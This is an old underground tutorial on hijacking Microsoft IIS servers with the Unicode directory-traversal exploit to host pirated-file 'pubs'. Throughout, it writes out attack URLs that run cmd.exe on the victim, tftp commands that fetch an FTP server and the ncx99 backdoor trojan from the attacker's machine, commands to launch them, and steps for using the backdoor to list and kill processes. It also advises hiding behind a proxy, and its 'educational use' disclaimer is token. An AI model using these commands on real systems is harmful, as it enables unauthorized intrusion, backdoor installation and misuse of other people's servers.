The How-To Hack IIS Servers For Pubstros

Tutorial about Hacking using IIS exploits

This one goes for the people that ask for a tut to start hacking.
if u wanna know more research yourself
Pub Hacking Tutorial
The How-To Hack IIS Servers For Pubstros
(By GENERAL NEWBIE)
March 20 ,2002
#################################################F
or Educational Use Only##############################################
#####
Getting Started is simple... let me warn you that what your doing is illegal and
dangerous. Now then
This tutorial tells you how to hack IIS servers and make them as a pub... and ho
w to rehack someone
elses pub hahahahaha!
Now then the tools and knowledge you will need are as follows
Tools Required:
1. Serv-u Ftp Server 4.0 works just fine but versions 3.0 doesnt require an addi
tional dll file
2. TFTPSuitePro2000 (h**p://www.walusoft.co.uk/software/tftppro.exe)
3. Your Brain with knowledge of the IIS Unicode Exploit or MSDAC Exploit
4. Internet Explorer
5. Other things to try
Ok Let Me Start By Saying This Is For Education Purpouses Only And I Take No Respo
nsibility For What You Do
The Setup
Step 1: Install Serv-u AND download the already preconfigured ServuDaemon from m
e (recommended as i will be explaining from this)
The reason why i told you to download both is because the Servu Version 4 that y
ou download has a admin program so you can
make your own ini file after you understand everything i have in mine.
Step 2: Install TFTPSuite (Durring Installation Pick SERVER)
TFTPSuitePro Setup Open TFTPSuitePro, When It Asks U To Register Hit Register Th
an Cancel.You Should Have Sumtin That Looks
Like This Hit System->Setup For Inbound Path File, Hit Browse And Pick The C:\FT
P dir We Made, And Do The Same For
Outbound Then Hit Ok. Now then when its time to upload files TFTP SERVER MUST BE
RUNNING
Step 3: Unzip the Zip/Rar where you will find some goodies to help you scan for
IIS servers and find one to hack
Here you will find tons of little programs that will assist you in hacking your
server.
Step 4: FIND A VERNURABLE SERVER
Step 5: Start Making the Pub
Ok im assuming you have a host that you can maybe get away with uploading files
to.. and i say this because some networks
are behind firewalls that dont allow TFTP to connect to outside host and estabis
h a connection. Thus even though
you can use the unicode exploit on it to view all the files still doesnt mean yo
u can upload files to it..
PLus some host administrators make it so that you cant write to the HD... GOOD L
UCk THERE
Starting To THE HACK
FIRST BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!!
The Right Side, You Should Be At A Directory Listing In Internet Explorer.The Di
r Should Look Like This :
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+d ir+c:\ <----- This line wi
ll vary
Directory of c:\
07/17/02 12:17a 1,000,000 ---=1Mb=---
05/03/02 08:57a 0 AUTOEXEC.BAT
05/03/02 08:54a 0 AUTOEXEC.CAM
06/01/01 09:09a 0 CONFIG.SYS
12/26/01 12:46p <DIR> Desktop
06/01/01 02:20p <DIR> I386
07/08/02 02:52p <DIR> intepub
06/01/01 02:49p <DIR> NIC
12/23/01 08:32p <DIR> NIMDA TO
12/23/01 08:32p <DIR> Nimda Tool
07/17/02 05:56p 65,634,304 pagefile.sys
01/04/02 04:31p <DIR> Program Files
07/17/02 12:14a <DIR> TEMP
06/05/01 05:01p <DIR> temptape
06/01/01 04:53p <DIR> Video
12/23/01 09:53p <DIR> Windows Update Setup Files
07/17/02 05:50p <DIR> WINNT
19 File 72,687,972 bytes
480,750,592 bytes free
Ok you get the idea of what your browser looks like because your experienced but
you are clueless about this pub crap
Now then you will need to start and run TFTP SERVER making sure you arent runnin
g and firewall because it will block
your request.Now we will need to send the files through the TFTP Server to the h
ost. And to do this you do something like
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c :\winnt\system32\tftp.exe+
"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe
Now then you arent limited to just 1 dir to install this server to.. i like to h
ide mine in the c:\winnt\system but some people use the c:\intepub\scripts
h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c :\winnt\system32\tftp.exe+
"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\Serv UDaemon.exe
So then you would copy the above line into the Internet Explorer And Hit Enter,
Look At Your TFTPSuitePro Window
And u Should See Its Uploading A File. NOTE SOMETIMES you get an error msg just
refresh the page or..copy into another window and try again
remember sometimes you get this msg because the host cant connect properly to yo
u..
Repeat for the following files:
SFIND.exe -------> used to scan for more.. servers
KILL.EXE -------> used to kill a task very handy
TLIST.EXE -------> used to list all running processes or Task List
ncx99.exe -------> used to have as a backdoor remote trojan that runs on port 99

iis-scanner.EXE great for scanning servers
servudaemon.ini needed for servu
HOW THE UPLOAD FILES SHOULD LOOK gave 2 examples
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser
vUDaemon.ini+c:\winnt\system\ServUDaemon.ini
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser
vUDaemon.exe+c:\winnt\system\ServUDaemon.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser
vUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Ser
vUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+Tzo
Libr.dll+c:\winnt\system\TzoLibr.dll
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+ncx
99.exe+c:\winnt\system\ncx99.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+ -i+%20**.***.**.**+GET+bnc
.cfg+c:\winnt\system\tlist.exe
EXCUTE PROGRAMS
h**p://www.target.com/scripts/..%25...md.exe?/c+call+ c:\winnt\system\ncx99.exe
h**p://www.target.com/scripts/..%25...md.exe?/c+start +c:\winnt\system\ncx99.exe

h**p://www.target.com/scripts/..%25...md.exe?/c+c:\nc x99.exe%20/h
After the file has been executed The Ftp Should Be Up!
Test It With The Server Ip/Port/L/p You Setup Back In Servu Ftp Settings.
If It Works You Now Have Complete Control Over The System!
Now then here is where the Serv U 4.0 comes in you may now use the admin program
that comes with it so that you can
set up your server the way you want. You have Admin rights
Other Shit How To Use 'Kill' And 'Tlist' and 'ncx99.exe'
Tlist = Lists All Running Programs On Remote Machine
Kill = Kills Ones U Specicify
ncx99.exe = Dos like trojan
How to use ncx99
C:\>telnet host 99
Then once you connect to your server you will see dos like enviroment so find wh
ere you uploaded tlist.exe and execute it
c:\> cd winnt
c:\>winnt\ cd system
c:\>winnt\system\tlist.exe
Tlist is good when you have ncx99.exe installed so its easier to just call it up

c:\>winnt\system\tlist.exe
-2 Idle.exe
4 System.exe
840 smss.exe
948 csrss.exe
972 winlogon.exe NetDDE Agent
1016 services.exe
1028 lsass.exe
1216 svchost.exe
1364 svchost.exe
1500 svchost.exe
1636 svchost.exe
1820 spoolsv.exe
1952 CTSVCCDA.exe
1988 mdm.exe
2024 DUC20.exe Duc20
408 MsPMSPSv.exe
3024 svchost.exe
360 explorer.exe Program Manager
3496 ctfmon.exe CiceroUIWndFrame
3068 WinCinemaMgr.exe InterVideo WinCinema Manager
1124 evntsvc.exe Notification Wnd for RNAdmin
1568 msmsgs.exe DDE Server Window
2664 iis-scanner.exe Notification Window
2172 r_server.exe
3712 daemon.exe
2800 cmd.exe Command Prompt
3880 TLIST.exe
-2 _Total.exe
now then to kill it there are two ways i will show you the first is from within
the nxc99.exe because its best
just look at the tlist.exe list and find the system process you want to kill
now from the same dir that you installed kill run kill and
for me it would be
c:\>winnt\system\kill.exe
now then lets say i wanted to close explorer.exe i look at the tlist and see tha
t '360 explorer.exe' Program Manager
360 is the process id that you will use to close down Explorer.exe so you call i
t like this
c:\>winnt\system\kill.exe 360
do another tlist.exe and you will no longer see explorer.exe there
the other way to do this is to use the url
h**p://www.target.com/scripts/..%25...md.exe?/c+start +c:\winnt\system\kill.exe?
number
where number is again from the tlist.exe
so to kill explorer.exe we do something like this
h**p://www.target.com/scripts/..%25...md.exe?/c+start +c:\winnt\system\kill.exe?
360
and it should say killed.